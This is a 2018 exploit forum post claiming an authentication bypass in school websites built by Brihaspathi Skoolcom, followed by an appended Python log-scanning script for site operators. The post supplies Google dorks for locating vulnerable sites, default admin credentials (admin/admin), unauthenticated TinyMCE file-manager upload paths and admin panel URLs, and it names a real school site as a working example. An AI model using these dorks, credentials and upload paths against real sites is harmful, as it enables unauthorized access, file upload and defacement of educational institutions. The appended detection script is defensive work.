Topic: Brihaspathi Skoolcom India Auth Bypass Exploit
KingSkrupellos
Comment: #1
Brihaspathi Skoolcom India Auth Bypass Exploit
06.09.2018 02:58
#################################################################################################

# Exploit Title : Brihaspathi Skoolcom India Software Development Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/09/2018
# Vendor Homepages : brihaspathi.com ~ skoolcom.in
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ] - CWE-264 [Permissions, Privileges, and Access Controls]

#################################################################################################

# Designed and Developed by Brihaspathi Skoolcom India Software Development Authentication Bypass Vulnerability

# Google Dork :

intext:''Designed and Developed by Brihaspathi''

intext:''Copyright © 2015 DPS Secunderabad. All Rights Reserved.''

# Admin Panel Login Path => /admin/login.php

Username : admin

Password : admin

# MCFileManager Example TinyMCE MoxieCode FileManager Exploit =>

/admin/tiny_mce/plugins/filemanager/pages/fm/index.html
/admin/tiny_mce/plugins/filemanager/examples.html

# Uploaded File Path => ..../admin/tiny_mce/plugins/filemanager/files/....

# Usable Admin Control Panel URL Links =>

/admin/home.php
/admin/imagefolder.php
/admin/latestnews.php
/admin/events.php
/admin/exambranch.php
/admin/news.php
/admin/school.php
/admin/about.php
/admin/curricular.php
/admin/results.php
/admin/ebook.php
/admin/videodetails.php
/admin/change_password.php

# Uploaded File Paths =>

/images/latestnews/....
/images/news/...

#################################################################################################

# Example Site => avniet.ac.in/admin/tiny_mce/plugins/filemanager/pages/fm/index.html => [ Proof of Concept ] => archive.is/K52wF

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

We don't care what people think about us, we are proud of us, we are not gonna change for anyone. I do not have my own website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.
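
For site operators checking whether they are affected, here is an added detection example (not part of the original post) that scans web server access logs for the paths listed above. It assumes the combined log format and a PHP host; the extension list, finding names and sample log lines are constructed for illustration.

```python
import re

# Paths below are the ones named in the post.
FILEMANAGER_PAGES = (
    "/admin/tiny_mce/plugins/filemanager/pages/fm/index.html",
    "/admin/tiny_mce/plugins/filemanager/examples.html",
)
UPLOAD_DIRS = (
    "/admin/tiny_mce/plugins/filemanager/files/",
    "/images/latestnews/",
    "/images/news/",
)
# Assumption: extensions the PHP handler may execute, including double extensions.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
# Combined log format: ip ident user [time] "METHOD target proto" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def classify(line):
    """Return (client_ip, finding, path) for a request worth reviewing, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    path = target.split("?", 1)[0].lower()
    if path in FILEMANAGER_PAGES and status.startswith("2"):
        return (ip, "filemanager-reachable", path)   # page served without auth
    if path.startswith(UPLOAD_DIRS) and SCRIPT_EXT.search(path):
        return (ip, "script-in-upload-dir", path)    # executable name in an upload dir
    if path == "/admin/login.php" and method == "POST":
        return (ip, "admin-login-attempt", path)     # review source against known admins
    return None

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges), not from any real server.
SAMPLE = [
    '203.0.113.7 - - [06/Sep/2018:03:01:10 +0000] "GET /admin/tiny_mce/plugins/filemanager/pages/fm/index.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [06/Sep/2018:03:02:44 +0000] "GET /images/news/a.php.jpg HTTP/1.1" 200 312',
    '198.51.100.20 - - [06/Sep/2018:03:05:00 +0000] "GET /images/news/sports-day.jpg HTTP/1.1" 200 48211',
    '198.51.100.9 - - [06/Sep/2018:03:06:30 +0000] "POST /admin/login.php HTTP/1.1" 302 0',
    '198.51.100.9 - - [06/Sep/2018:03:07:02 +0000] "GET /admin/tiny_mce/plugins/filemanager/examples.html HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

Any `filemanager-reachable` hit means the file manager pages should be removed or placed behind authentication, and the `admin` account password changed from its default.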
